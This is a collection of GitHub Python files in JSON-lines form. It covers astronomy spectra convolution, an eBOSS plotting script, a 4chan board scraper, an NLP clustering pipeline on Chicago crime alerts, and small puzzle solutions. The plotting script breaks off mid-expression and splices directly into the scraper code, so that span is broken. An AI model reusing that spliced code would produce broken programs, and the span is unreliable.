file\n        try:\n            INI = pickle.load(fp)\n            fp.close()\n            fwhm = (fwhm_as/INI['angle']) * (NSPE-1.0)   # fwhm, in units where [0, NSPE-1] is the cloud radius\n        except:\n            print(\"*** ConvolveSpectra1D fails: angle_as not given as argument and not found in the spectrum file\")\n            sys.exit(0)\n    else:\n        fwhm = (fwhm_as/angle_as) * (NSPE-1.0)   # fwhm [number of offset steps]\n    ###\n    platform, device, context, queue, mf = InitCL(GPU, platforms)\n    SPE_buf = cl.Buffer(context, mf.READ_ONLY, 4*NSPE*NCHN)\n    CON_buf = cl.Buffer(context, mf.READ_WRITE, 4*NSPE*NCHN)\n    INSTALL_DIR = os.path.dirname(os.path.realpath(__file__)) \n    source = open(INSTALL_DIR+\"/kernel_convolve_spectra_1d.c\").read()\n    program = cl.Program(context, source).build()\n    kernel_con = program.Convolve\n    kernel_con.set_scalar_arg_dtypes([np.int32, np.int32, np.int32, np.float32, None, None])\n    LOCAL = [ 1, 32 ][GPU>0]\n    GLOBAL = (NSPE//LOCAL+1)*LOCAL\n    cl.enqueue_copy(queue, SPE_buf, SPE)\n    kernel_con(queue, [GLOBAL,], [LOCAL,], NSPE, NCHN, int(samples)//2, fwhm, SPE_buf, CON_buf)\n    cl.enqueue_copy(queue, SPE, CON_buf)\n    ###\n    ofilename = filename.replace('.spe','')+'_convolved.spe'\n    fp = open(ofilename, 'wb')\n    asarray([NSPE, NCHN], int32).tofile(fp)\n    asarray([V0, DV],float32).tofile(fp)\n    asarray(SPE, float32).tofile(fp)\n    if (INI!=None):\n        pickle.dump(INI, fp)\n    fp.close()\n    return V0+arange(NCHN)*DV, SPE\n\n\n
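# Illustrative call (file name hypothetical):\n#   v, spe = ConvolveSpectra1D('model.spe', fwhm_as=30.0)\n# reads NSPE spectra, convolves them on the OpenCL device, writes the result\n# to 'model_convolved.spe', and returns the velocity axis and the spectra.\n\n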
F[0].header.update(CTYPE1 = 'RA---TAN')\n F[0].header.update(CTYPE2 = 'DEC--TAN')\n F[0].header.update(COORDSYS = 'EQUATORIAL')\n F[0].header.update(EQUINOX = 2000.0)\n if (nchn>0):\n F[0].data = zeros((nchn, n, m), float32)\n F[0].header['NAXIS' ] = 3\n F[0].header['NAXIS3'] = nchn\n F[0].header['CRPIX3'] = 0.5*(nchn+1.0)\n F[0].header['CRVAL3'] = 0.0\n F[0].header['CDELT3'] = dv\n F[0].header['CTYPE3'] = 'velocity'\n else:\n F[0].data = zeros((n, m), float32)\n F.verify('fix')\n return F\n\n","repo_name":"mjuvela/LOC","sub_path":"LOC_aux.py","file_name":"LOC_aux.py","file_ext":"py","file_size_in_byte":76240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"12386173237","text":"import matplotlib \nmatplotlib.use('agg') \nimport time\nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom astropy.table import Table\nimport astropy.io.fits as fits\nimport matplotlib.gridspec as gridspec \nimport sys\n\n\nrpmin = 0.1\nrpmax = 50\npimax = 80\nhome = '/global/cscratch1/sd/jiaxi/master/'\nfor gal,ver in zip(['LRG','ELG'],['v7_2','v7']):\n for i,GC in enumerate(['NGC','SGC']):\n # ELG wp from Faizan\n obs = Table.read('{}catalog/nersc_wp_{}_{}/wp_rp_pip_eBOSS_{}_{}_{}.dat'.format(home,gal,ver,gal,GC,ver),format='ascii.no_header')\n obs = obs[(obs['col3']>=rpmin)&(obs['col3']0:\n return urls\n else:\n return None\n\ndef handle_com(com):\n \"\"\"Ugly function to remove all the html tags from the comment\n\n Args:\n com (str): comment\n\n Returns:\n str: stripped from html tags comment\n \"\"\"\n com = re.sub('
<br><br>', '\\n', com)\n    com = re.sub('<br>', '\\n', com)\n    com = re.sub('&gt;', '>', com)\n    com = re.sub('<span class=\"quote\">', '\\n', com)\n    com = re.sub('</span>', '', com)\n    com = re.sub('&#039;', \"'\", com)\n    com = re.sub('&quot;', '\"', com)\n    com = re.sub(r'<a href=\"#p\\d+\" class=\"quotelink\">&gt;&gt;\\d+</a>', '[REPLY]', com)\n    return com\n\n\ndef cycle_collector(board_name):\n    \"\"\"Function that takes snapshot of the board and logs data in dataframe\n\n    Args:\n        board_name (str): board to log\n    \"\"\"\n\n    #create a request\n    r = requests.get(board_name)\n    #r = requests.get('https://a.4cdn.org/tv/catalog.json')\n    r = r.json()\n\n    #getting a date\n    now = dt.now()\n\n    #UGLY SUBJECT TO CHANGE\n    date = str(now.year)+'-'+str(now.month)+'-'+str(now.day)+'_'+str(now.hour)+'-'+str(now.minute)\n\n    #open and save threads into the csv file\n    with open('dataset/pol_'+date+'.csv', mode='w') as csv_file:\n    #with open('dataset/tv_'+date+'.csv', mode='w') as csv_file:\n\n        #create field names\n        fieldnames = ['thread_num', 'post_time', 'id', 'country', 'com', 'filename', 'url']\n        writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n        writer.writeheader()\n\n        #for each thread on the board\n        for threads in gen_chan():\n\n            #thread\n            no = get_threads('no')\n            #now\n            now = get_threads('now')\n            #post time\n            time = get_threads('time')\n            #my time\n            my_time = dt.today()\n            #post text\n            com = handle_com(get_threads('com'))\n            #post name\n            name = get_threads('name')\n            #tripcode\n            trip = get_threads('trip')\n            #id\n            ids = get_threads('id')\n            #capcode?\n            capcode = get_threads('capcode')\n            #filename\n            filename = get_threads('filename')\n            #resto\n            rest = get_threads('resto')\n            #semantic_url\n            semantic_url = get_threads('semantic_url')\n            #replies\n            replies = get_threads('replies')\n            #images\n            images = get_threads('images')\n            #url - need to remake this one probably\n            url = find_urls(com)\n            #country\n            country = get_threads('country_name')\n\n            writer.writerow({'thread_num': no,\n                             'post_time': time,\n                             'id': ids,\n                             'country': country,\n                             'com': com,\n                             'filename': filename,\n                             'url': url})\n\n            #write all thread replies\n            if 'last_replies' in threads:\n                for comment in threads['last_replies']:\n\n                    #comment\n                    com = handle_com(comment.get('com', 'NaN'))\n                    #poster id\n                    ids = comment.get('id', 'NaN')\n                    #poster country\n                    country = comment.get('country_name', 'NaN')\n                    #post time\n                    time = comment.get('time', 'NaN')\n                    #filename\n                    filename_com = comment.get('filename', 'NaN') + comment.get('ext', 'NaN')\n                    #urls if present\n                    url = find_urls(com)\n\n                    writer.writerow({'thread_num': no,\n                                     'post_time': time,\n                                     'id': ids,\n                                     'country': country,\n                                     'com': com,\n                                     'filename': filename_com,\n                                     'url': url})\n\n    print(\"Done saving \", date)\n\ndef main():\n    \"\"\"Main function that runs a logging loop\n    \"\"\"\n    board_name = 'https://a.4cdn.org/pol/catalog.json'\n\n    while True:\n        cycle_collector(board_name)\n        time.sleep(300)\n\nif __name__ == \"__main__\":\n    main()\n ","repo_name":"AlexEgiazarov/ChanGuard","sub_path":"dataCollector.py","file_name":"dataCollector.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11264306049","text":"READ_FROM = r\"C:\\Users\\User\\Desktop\\python cyber\\copying machine\\f.txt\"\nWRITE_TO = r\"C:\\Users\\User\\Desktop\\python cyber\\copying machine\\e.txt\"\n\n\ndef main():\n    copy_file_to(READ_FROM, WRITE_TO)\n    print_file(WRITE_TO)\n\n\ndef copy_file_to(copy_from, copy_to):\n    with open(copy_from, \"r\") as read_from:\n        with open(copy_to, \"w\") as write_to:\n            for line in read_from:\n                write_to.write(line, )\n\n\ndef print_file(file):\n    with 
open(file, \"r\") as file:\n for line in file:\n print(line, )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OhadSG/Python","sub_path":"copying machine/Copying Machine.py","file_name":"Copying Machine.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35259579328","text":"#----------------------------------------------------------------------------\n# IMPORTS \n#----------------------------------------------------------------------------\n\nimport nltk\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nimport re\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom nltk import FreqDist\nfrom sklearn.cluster import KMeans\nfrom nltk.corpus import stopwords, wordnet\nfrom nltk.corpus.reader.plaintext import PlaintextCorpusReader\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer, TreebankWordTokenizer\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.manifold import MDS, TSNE\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom gensim import corpora\nfrom gensim.models import Word2Vec,LdaMulticore, TfidfModel\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\n\nfrom gensim.models.fasttext import FastText\nfrom sklearn.decomposition import PCA\n\n#----------------------------------------------------------------------------\n# GLOBALS\n#----------------------------------------------------------------------------\n\n#set working Directory to where class corpus is saved.\nprocessed_dir = '/Users/anton/Northwestern/MSDS453/chicago/'\nos.chdir(processed_dir)\n\nK = 11\nRANDOM_STATE = 42\nCORPUS_DIR = 'corpus/'\nCLEAN_CSV = 'outfiles/processed.csv'\nLDA_NUM_TOPICS = 11\nCLUSTER_KEYWORDS = 10\nMIN_DF=0.05\n\n#----------------------------------------------------------------------------\n# FUNCTIONS \n#----------------------------------------------------------------------------\n\ndef corpus_info(corpus):\n\n fids = len(corpus.fileids())\n paras = len(corpus.paras())\n sents = len(corpus.sents())\n sperp = sum(len(para) for para in corpus.paras()) / float(paras)\n tokens = FreqDist(corpus.words())\n count = sum(tokens.values())\n vocab = len(tokens)\n lexdiv = float(count) / float(vocab)\n\n print((\n \"\\n[+] Text corpus contains {} files composed of:\\n\"\n \" > {} paragraphs and {} sentences\\n\"\n \" > {:0.3f} sentences per paragraph\\n\"\n \" > word count of {} with a vocabulary of {}\\n\"\n \" > lexical diversity is {:0.3f}\"\n ).format(\n fids, paras, sents, sperp, count, vocab, lexdiv\n ))\n\ndef clean_to_csv(data):\n df = pd.DataFrame(data)\n df.to_csv(CLEAN_CSV, index=False)\n \ndef get_wordnet_pos(word):\n \"\"\"Map POS tag to first character lemmatize() accepts\"\"\"\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n\n return tag_dict.get(tag, wordnet.NOUN)\n\ndef clean_data(corpus):\n safe_words = ['armed', 'hit', 'run', 'gun']\n\n bad_words = ['january', 'february', 'march', 'april', 'may', 'june', 'july', \n 'august', 'september', 'october', 'november', 'december', 'block', \n 'north', 'south', 'east', 'west', 'monday', 'tuesday', 'wednesday', \n 'thursday', 'friday', 'approximately', 
'detective', 'chicago',\n 'investigation', 'unit', 'occur', 'month', 'incident', 'list', 'alert',\n 'general', 'geographical', 'location']\n\n # Initialize empty list to hold values\n titles = []\n processed_strings = []\n processed_save = []\n processed_words = []\n \n # For each file in the directory, clean, parse and save to lists\n for infile in sorted(corpus.fileids()):\n cleaned = {}\n raw_text = corpus.raw(infile)\n \n # Tokenize using TreebankWordTokenizer\n tokenizer = TreebankWordTokenizer()\n tokens = tokenizer.tokenize(raw_text)\n \n # remove punctuation from each word\n re_punc = re.compile('[^A-Za-z0-9]+')\n tokens = [re_punc.sub(' ', token) for token in tokens]\n \n # Convert text to lower-alpha - should already be done\n tokens=[token.lower().strip() for token in tokens if token.isalpha()]\n \n # Strip stop words\n stop_words = set(stopwords.words('english'))\n tokens = [token for token in tokens if not token in stop_words]\n \n # strip words with size <= 3, do not include safe_words\n tokens = [token for token in tokens if len(token) > 3 or token in safe_words]\n \n # Lemmatize robot, robotic, robotics, robots\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(token, get_wordnet_pos(token)) for token in tokens]\n \n # Remove bad words post lemmatize\n tokens = [token for token in tokens if token not in bad_words]\n\n # Append tokens to token list\n processed_words.append(tokens)\n \n # Rebuild the tokens into a single string\n single = TreebankWordDetokenizer().detokenize(tokens)\n processed_strings.append(single)\n \n # Append the title and clean data to a list - for saving to csv\n absolute_path = os.path.abspath(infile)\n path = os.path.dirname(absolute_path)\n category = os.path.basename(path)\n\n cleaned['titles'] = infile\n cleaned['data'] = single\n cleaned['category'] = category\n \n processed_save.append(cleaned)\n \n # Save the titles\n titles.append(infile)\n \n # Save to csv for later processing\n clean_to_csv(processed_save)\n \n # Return lists\n return processed_strings, processed_words, titles\n\ndef create_ec(dictionary, corpus):\n for key, values in dictionary.items():\n for value in values:\n corpus= corpus.replace(value, key)\n return corpus\n\n\n#----------------------------------------------------------------------------\n# GET DATA \n#----------------------------------------------------------------------------\n\n# Generate corpus from all text files and get info on the corpus\nraw_corpus = PlaintextCorpusReader(CORPUS_DIR, '.*\\.txt')\ncorpus_info(raw_corpus)\n\n# Clean the data\nprocessed_strings, processed_words, titles = clean_data(raw_corpus)\n\n# Create equivalence classes - work in progress\nec ={'arson': ['molotov', 'incendiary', 'flame', 'ignited'], \n 'homicide': ['murder', 'shot'], 'residential': ['garage', 'apartment'],\n 'gun': ['handgun', 'weapon'], 'vehicle': ['automobile', 'auto'], \n 'child': ['juvenile'], 'assault': ['abuse'], 'abduct': ['lure']}\n\n# Apply the ECs\nnew_processed = list()\nfor i in processed_strings:\n new_processed.append(create_ec(ec, i))\n\nprocessed_strings = new_processed\n\n#----------------------------------------------------------------------------\n# SKLEARN TFIDF \n#----------------------------------------------------------------------------\n\n# Call Tfidf Vectorizer - range 3 \nTfidf=TfidfVectorizer(ngram_range=(1,3), max_df=0.95, min_df=MIN_DF)\n\n# Fit the vectorizer using final processed documents.\nTFIDF_matrix=Tfidf.fit_transform(processed_strings) \n\n# Creating datafram from TFIDF 
Matrix\nmatrix=pd.DataFrame(TFIDF_matrix.toarray(), columns=Tfidf.get_feature_names(), index=titles)\n\n#print('\\n[+] Word Frequency across documents: N-Grams -> N=3')\n#print(' > ', Tfidf.get_feature_names())\n\naverage_TFIDF={}\nfor i in matrix.columns:\n average_TFIDF[i]=np.mean(matrix[i])\n\naverage_TFIDF_DF=pd.DataFrame(average_TFIDF,index=[0]).transpose()\n\naverage_TFIDF_DF.columns=['TFIDF']\n\n#calculate Q1 and Q3 range\nQ1=np.percentile(average_TFIDF_DF, 25)\nQ3=np.percentile(average_TFIDF_DF, 75)\nIQR = Q3 - Q1\noutlier=Q3+(1.5*IQR)\n\n# words that exceed the Q3+IQR*1.5\noutlier_list=average_TFIDF_DF[average_TFIDF_DF['TFIDF']>=outlier]\nkeep_list=average_TFIDF_DF[average_TFIDF_DF['TFIDF'] {}'.format(feature_names[sorted_by_idf[:8]]))\nprint('\\n[+] Features with highest idf:\\n > {}'.format(feature_names[sorted_by_idf[-8:]]))\n\n# TF-IDF - Maximum token value throughout the whole dataset\n#new1 = tf.transform(processed_strings)\n\n# find maximum value for each of the features over all of dataset:\nmax_val = TFIDF_matrix.max(axis=0).toarray().ravel()\n\n#sort weights from smallest to biggest and extract their indices \nsort_by_tfidf = max_val.argsort()\nprint('\\n[+] Features with lowest tfidf:\\n > {}'.format(feature_names[sort_by_tfidf[:8]]))\nprint('\\n[+] Features with highest tfidf: \\n > {}'.format(feature_names[sort_by_tfidf[-8:]]))\n\n#from sklearn.naive_bayes import MultinomialNB\n#clf = MultinomialNB().fit(X, Y)\n#print(clf.predict(count_vect.transform([\"\"])))\n\n#----------------------------------------------------------------------------\n# DOC2VEC \n#----------------------------------------------------------------------------\n\n# Initialize and train model\ndocuments = [TaggedDocument(doc, [i]) for i, doc in enumerate(processed_strings)]\nmodel = Doc2Vec(documents, vector_size=5, window=2, min_count=1, workers=4)\n\n# Infer vector to dataframe\ndoc2vec_df=pd.DataFrame()\nfor i in range(0,len(processed_words)):\n vector=pd.DataFrame(model.infer_vector(processed_words[i])).transpose()\n doc2vec_df=pd.concat([doc2vec_df,vector], axis=0)\n\ndoc2vec_df=doc2vec_df.reset_index()\n\ndoc_titles={'title': titles}\nt=pd.DataFrame(doc_titles)\n\ndoc2vec_df=pd.concat([doc2vec_df,t], axis=1)\n\ndoc2vec_df=doc2vec_df.drop('index', axis=1)\n\n#----------------------------------------------------------------------------\n# WORD2VEC \n#----------------------------------------------------------------------------\n\n#Note, there are opportunities to use the word2vec matrix to determine words \n#which are similar. Similar words can be used to create equivalent classes. 
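# (illustrative sketch only, not part of the original pipeline: once model_w2v
#  is trained below, nearest neighbours above a similarity cutoff could seed an
#  EC, e.g. [w for w, s in model_w2v.wv.most_similar('gun', topn=10) if s > 0.7];
#  the 0.7 cutoff is an assumed, tunable threshold)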
\n#k-means is not used to group individual words using the Word2Vec output.\n\n# word to vec\nmodel_w2v = Word2Vec(processed_words, size=100, window=5, min_count=0.75, workers=4)\n\n# join all processed DSI words into single list\nprocessed_text_w2v=[]\nfor i in processed_words:\n for k in i:\n processed_text_w2v.append(k)\n\n# obtian all the unique words from DSI\nw2v_words=list(set(processed_text_w2v))\n\n#can also use the get_feature_names() from TFIDF to get the list of words\n#w2v_words=Tfidf.get_feature_names()\n\n# empty dictionary to store words with vectors\nw2v_vectors={}\n\n# for loop to obtain weights for each word\nfor i in w2v_words:\n temp_vec=model_w2v.wv[i]\n w2v_vectors[i]=temp_vec\n\n# create a final dataframe to view word vectors\nw2v_df=pd.DataFrame(w2v_vectors).transpose()\n\n# Extract vectors and words for visualizaing\nvecs = w2v_df.as_matrix(columns=w2v_df.columns[1:])\nunique_words = w2v_df.index\n\n# Reduce the number of components and visualize\ntsne = TSNE(n_components=2, random_state=0, n_iter=5000, perplexity=3)\nnp.set_printoptions(suppress=True)\nT = tsne.fit_transform(vecs)\nlabels = unique_words\n\nplt.figure(figsize=(20, 20))\nplt.scatter(T[:, 0], T[:, 1], c='orange', edgecolors='r')\nfor label, x, y in zip(labels, T[:, 0], T[:, 1]):\n plt.annotate(label, xy=(x+1, y+1), xytext=(0, 0), textcoords='offset points')\n\n#----------------------------------------------------------------------------\n# K-MEANS CLUSTERING w/TFIDF \n#----------------------------------------------------------------------------\n\n# Initialize and fit\nkm = KMeans(n_clusters=K, random_state=RANDOM_STATE)\nkm.fit(TFIDF_matrix)\nclusters = list(km.labels_)\n\nterms = Tfidf.get_feature_names()\nDictionary={'Doc Name': titles, 'Cluster': clusters, 'Text': processed_strings}\nframe=pd.DataFrame(Dictionary, columns=['Cluster', 'Doc Name', 'Text'])\n\nprint(\"\\n[+] Top terms per cluster:\")\n\n#sort cluster centers by proximity to centroid\norder_centroids = km.cluster_centers_.argsort()[:, ::-1] \n\nterms_dict=[]\n\n#save the terms for each cluster and document to dictionaries. To be used later\n#for plotting output.\n\n#dictionary to store terms and titles\ncluster_terms={}\ncluster_title={}\n\nfor i in range(K):\n print(\"\\nCluster %d:\" % i),\n temp_terms=[]\n temp_titles=[]\n for ind in order_centroids[i, :CLUSTER_KEYWORDS]:\n print(' > %s' % terms[ind])\n terms_dict.append(terms[ind])\n temp_terms.append(terms[ind])\n cluster_terms[i]=temp_terms\n \n print(\"\\nCluster %d titles:\" % i, end='\\n')\n temp=frame[frame['Cluster']==i]\n for title in temp['Doc Name']:\n print(' > %s' % title, end='\\n')\n temp_titles.append(title)\n cluster_title[i]=temp_titles\n\n#----------------------------------------------------------------------------\n# PLOTTING - TFIDF\n#----------------------------------------------------------------------------\n\n# convert two components as we're plotting points in a two-dimensional plane\n# \"precomputed\" because we provide a distance matrix\n# we will also specify `random_state` so the plot is reproducible.\nmds = MDS(n_components=2, dissimilarity=\"precomputed\", random_state=RANDOM_STATE)\n\ndist = 1 - cosine_similarity(TFIDF_matrix)\n\npos = mds.fit_transform(dist) # shape (n_components, n_samples)\n\nxs, ys = pos[:, 0], pos[:, 1]\n\n#set up cluster names using a dict. 
\ncluster_dict=cluster_title\n\n#create data frame that has the result of the MDS plus the cluster numbers and titles\ndf = pd.DataFrame(dict(x=xs, y=ys, label=clusters, title=range(0,len(clusters)))) \n\n#group by cluster\ngroups = df.groupby('label')\n\nfig, ax = plt.subplots(figsize=(12, 12)) # set size\nax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\n#iterate through groups to layer the plot\n#note that I use the cluster_name and cluster_color dicts with the 'name' lookup to return the appropriate color/label\nfor name, group in groups:\n ax.plot(group.x, group.y, marker='o', linestyle='', ms=10,\n label=cluster_dict[name], mec='none') \n ax.set_aspect('auto')\n ax.title.set_text('TFIDF')\n ax.tick_params(\\\n axis= 'x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=True)\n ax.tick_params(\\\n axis= 'y', # changes apply to the y-axis\n which='both', # both major and minor ticks are affected\n left=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelleft=True)\n\n \nax.legend(title='Legend', loc='center left', bbox_to_anchor=(1, 0.5)) #show legend with only 1 point\n\n#The following section of code is to run the k-means algorithm on the doc2vec outputs.\n#note the differences in document clusters compared to the TFIDF matrix.\n#----------------------------------------------------------------------------\n# K-MEANS CLUSTERING w/DOC2VEX\n#----------------------------------------------------------------------------\n\ndoc2vec_k_means=doc2vec_df.drop('title', axis=1)\n\nkm = KMeans(n_clusters=K, random_state=RANDOM_STATE)\nkm.fit(doc2vec_k_means)\nclusters_d2v = km.labels_.tolist()\n\nDictionary={'Doc Name':titles, 'Cluster':clusters_d2v, 'Text': processed_strings}\nframe=pd.DataFrame(Dictionary, columns=['Cluster', 'Doc Name', 'Text'])\n\n#dictionary to store clusters and respective titles\ncluster_title={}\n\n#note doc2vec clusters will not have individual words due to the vector representation\n#is based on the entire document not indvidual words. As a result, there won't be individual\n#word outputs from each cluster. \nfor i in range(K):\n temp=frame[frame['Cluster']==i]\n temp_title_list=[]\n for title in temp['Doc Name']:\n temp_title_list.append(title)\n cluster_title[i]=temp_title_list\n\n#----------------------------------------------------------------------------\n# PLOTTING - DOC2VEC\n#----------------------------------------------------------------------------\n\nmds = MDS(n_components=2, dissimilarity=\"precomputed\", random_state=RANDOM_STATE)\n\ndist = 1 - cosine_similarity(doc2vec_k_means)\n\npos = mds.fit_transform(dist) # shape (n_components, n_samples)\n\nxs, ys = pos[:, 0], pos[:, 1]\n\n#set up cluster names using a dict. 
\ncluster_dict=cluster_title \n\n#create data frame that has the result of the MDS plus the cluster numbers and titles\ndf = pd.DataFrame(dict(x=xs, y=ys, label=clusters, title=range(0,len(clusters)))) \n\n#group by cluster\ngroups = df.groupby('label')\n\nfig, ax = plt.subplots(figsize=(12, 12)) # set size\nax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\n#iterate through groups to layer the plot\n#note that I use the cluster_name and cluster_color dicts with the 'name' lookup to return the appropriate color/label\nfor name, group in groups:\n ax.plot(group.x, group.y, marker='o', linestyle='', ms=12,\n label=cluster_dict[name], mec='none')\n ax.set_aspect('auto')\n ax.title.set_text('K-MEANS')\n ax.tick_params(\\\n axis= 'x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=True)\n ax.tick_params(\\\n axis= 'y', # changes apply to the y-axis\n which='both', # both major and minor ticks are affected\n left=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelleft=True)\n\nax.legend(title='Clusters', loc='center left', bbox_to_anchor=(1, 0.5)) #show legend with only 1 point\n\n#The following section is used to create a model to predict the clusters labels \n#based on the the TFIDF matrix and the doc2vec vectors. Note the model performance \n#using the two different vectorization methods.\n#----------------------------------------------------------------------------\n# CLASSIFICATION - VARIOUS METHODS\n#----------------------------------------------------------------------------\n\n# Instantiate RF \nmodel_RF=RandomForestClassifier()\n\n# TFIDF\nY=clusters\nX=TFIDF_matrix\n\n# cross validation\ncv_score=cross_val_score(model_RF, X, Y)\n\n#mean CV score\nnp.mean(cv_score)\n\nprint('\\n[+] Performance: ')\nprint(' > Random Forest mean_cv_score: {}'.format(round(np.mean(cv_score), 4)))\n\n\n\n#Doc2Vec\nY=clusters_d2v\nX=doc2vec_k_means\n\n#cross validation\ncv_score=cross_val_score(model_RF, X, Y)\n\n#mean CV score\nnp.mean(cv_score)\n\nprint(' > Doc2Vec mean_cv_score: {}'.format(round(np.mean(cv_score), 4)))\n\n#----------------------------------------------------------------------------\n# LDA \n#----------------------------------------------------------------------------\n\n#LDA using bag of words\ndictionary = corpora.Dictionary(processed_words)\ncorpus = [dictionary.doc2bow(doc) for doc in processed_words]\n\nldamodel = LdaMulticore(corpus, num_topics=LDA_NUM_TOPICS, id2word=dictionary, passes=2, workers=2) \n\nprint('\\n[+] LDA Bag of Words')\nfor idx, topic in ldamodel.print_topics(-1):\n print(' > Topic: {}'.format(idx))\n print(' > Words: {}'.format(topic))\n\nprint('\\n[+] LDA TFIDF')\ntfidf = TfidfModel(corpus)\ncorpus_tfidf = tfidf[corpus]\nldamodel = LdaMulticore(corpus_tfidf, num_topics=LDA_NUM_TOPICS, id2word=dictionary, passes=2, workers=2) \n\nfor idx, topic in ldamodel.print_topics(-1):\n print(' > Topic: {}'.format(idx))\n print(' > Words: {}'.format(topic))\n\n\n\n#the following section is example code to create ECs within the corpus. A dictionary\n#will need to be created for every EC. 
Each EC will need to be applied to the corpus.\n#Below is an example of how the function works.\n#----------------------------------------------------------------------------\n# SVD\n#----------------------------------------------------------------------------\n\n# raw documents to tf-idf matrix: \n#vectorizer = TfidfVectorizer(stop_words='english', \n# use_idf=True, \n# smooth_idf=True)\n# SVD to reduce dimensionality: \n#svd_model = TruncatedSVD(n_components=100, algorithm='randomized', n_iter=10)\n\n# pipeline of tf-idf + SVD, fit to and applied to documents:\n#svd_transformer = Pipeline([('tfidf', vectorizer), ('svd', svd_model)])\n#svd_matrix = svd_transformer.fit_transform(processed_strings)\n\n# Set values for various parameters. Tune as needed\nfeature_size = 100 # Word vector dimensionality \nwindow_context = 10 # Context window size \nmin_word_count = 1 # Minimum word count \nsample = 1e-3 # Downsample setting for frequent words\n\n# sg decides whether to use the skip-gram model (1) or CBOW (0)\nft_model = FastText(processed_words, size=feature_size, window=window_context, \n min_count=min_word_count,sample=sample, sg=1, iter=50)\n \n# view similar words based on gensim's FastText model\nsimilar_words = {search_term: [item[0] for item in ft_model.wv.most_similar([search_term], topn=5)]\n for search_term in ['handgun', 'arson', 'homicide', 'armed', 'gun', 'murder', 'fire', 'shot', 'robbery', 'theft', 'burglary', 'sexual', 'kidnap']}\n\nprint('\\n[+] Word similarities:')\nprint(similar_words)\n\n# use Principal Component Analysis (PCA) to reduce the word embedding \n# dimensions to 2-D and then visualize the same\nwords = sum([[k] + v for k, v in similar_words.items()], [])\nwvs = ft_model.wv[words]\n\npca = PCA(n_components=2)\nnp.set_printoptions(suppress=True)\nP = pca.fit_transform(wvs)\nlabels = words\n\nplt.figure(figsize=(12, 10))\nplt.scatter(P[:, 0], P[:, 1], c='lightgreen', edgecolors='g')\nfor label, x, y in zip(labels, P[:, 0], P[:, 1]):\n plt.annotate(label, xy=(x+0.06, y+0.03), xytext=(0, 0), textcoords='offset points')\n\n","repo_name":"af001/Data-Science-Portfolio","sub_path":"MSDS453/nlp_topic_cluster_analysis.py","file_name":"nlp_topic_cluster_analysis.py","file_ext":"py","file_size_in_byte":22382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"20410488873","text":"def num_primorial(n):\n count, mul, i = 0, 1, 2\n\n while count != n:\n if isprime(i):\n mul *= i\n count += 1\n i += 1\n\n return mul\n\ndef isprime(n):\n\n if n<2:\n return False\n\n for i in range(2, int(n**0.5)+1):\n if n % i == 0:\n return False\n \n return True\n\nprint(num_primorial(5))","repo_name":"namujinju/study-note","sub_path":"algorithm-study/codewars/num_primorial.py","file_name":"num_primorial.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39170941709","text":"import operator\n\nsum = 0\nwith open('input') as f:\n lines = [ x.strip() for x in f.readlines()]\nfor line in lines:\n linesplit = line.split('-')\n name = linesplit[:-1]\n (idnbr,checksum) = linesplit[-1].split('[')\n checksum = checksum[:-1]\n\n char_count = {}\n for word in name:\n for char in word:\n if not char in char_count:\n char_count[char] = 1\n else:\n char_count[char] += 1\n sorted_char_count = sorted(char_count.items(), key=operator.itemgetter(0))\n sorted_char_count = sorted(sorted_char_count, key=operator.itemgetter(1),\n reverse = True)\n 
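    # the two-pass sort leans on Python's stable sort: first alphabetically by
    # character, then by count descending, so ties in count stay alphabetical --
    # exactly the room-checksum rule; e.g. {'a': 2, 'b': 3, 'c': 2} sorts to
    # [('b', 3), ('a', 2), ('c', 2)]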
